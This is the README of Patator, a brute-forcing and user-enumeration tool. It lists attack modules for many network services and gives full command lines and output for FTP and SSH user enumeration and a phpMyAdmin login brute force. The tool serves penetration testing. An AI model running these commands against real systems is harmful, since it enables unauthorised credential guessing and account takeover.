# Patator Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors. Currently it supports the following modules: ``` * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * rdp_gateway : Brute-force RDP Gateway * ajp_fuzz : Brute-force AJP * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * rlogin_login : Brute-force rlogin * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * rdp_login : Brute-force RDP (NLA) * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * ike_enum : Enumerate IKE transforms * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files * sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases * umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes ``` The name "Patator" comes from [this](https://www.youtube.com/watch?v=kU2yPJJdpag). Patator is NOT script-kiddie friendly, please read the full README inside [patator.py](patator.py) before reporting. Please donate if you like this project! :) [![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=SB36VJH4EM5WG&lc=AU&item_name=lanjelot&item_number=patator¤cy_code=AUD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted) Many thanks! [@lanjelot](https://twitter.com/lanjelot) ## Usage Examples * FTP : Enumerating users denied login in vsftpd/userlist ``` $ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT 19:36:06 patator INFO - 19:36:06 patator INFO - code size time | candidate | num | mesg 19:36:06 patator INFO - ----------------------------------------------------------------------------- 19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful. 19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful. 19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied. 19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied. 19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied. ... ``` Tested against `vsftpd-3.0.2-9` on `CentOS 7.0-1406` * SSH : Time-based user enumeration ``` $ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3 17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT 17:45:20 patator INFO - 17:45:20 patator INFO - code size time | candidate | num | mesg 17:45:20 patator INFO - ----------------------------------------------------------------------------- 17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | timed out 17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | timed out 17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | timed out ... ``` Tested against openssh-server 1:6.0p1-4+deb7u2 on Debian 7.8 * HTTP : Brute-force phpMyAdmin logon ``` $ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf 11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST 11:53:47 patator INFO - 11:53:47 patator INFO - code size:clen time | candidate | num | mesg 11:53:47 patator INFO - ----------------------------------------------------------------------------- 11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK 11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK ^C 11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s 11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40 ``` Payload #72 was a false positive due to an unexpected error message: ``` $ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt ... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)